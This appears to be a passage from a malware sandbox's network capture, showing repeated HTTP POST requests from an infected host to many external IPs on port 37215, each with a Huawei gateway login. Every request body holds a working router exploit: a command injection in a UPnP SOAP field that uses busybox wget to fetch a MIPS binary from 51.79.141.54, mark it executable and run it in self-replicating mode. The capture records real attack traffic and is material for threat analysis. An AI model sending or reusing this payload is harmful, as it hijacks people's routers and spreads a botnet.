                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.571605921 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    99192.168.2.143718641.216.54.18537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.167098045 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.514997959 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    100192.168.2.1434884157.12.119.9937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.167098045 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.521882057 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    101192.168.2.1450136157.61.150.14937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.168709040 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.509433031 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    102192.168.2.1443062157.255.193.20437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.168709993 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.509433031 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    103192.168.2.1438180197.37.236.9837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.176117897 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
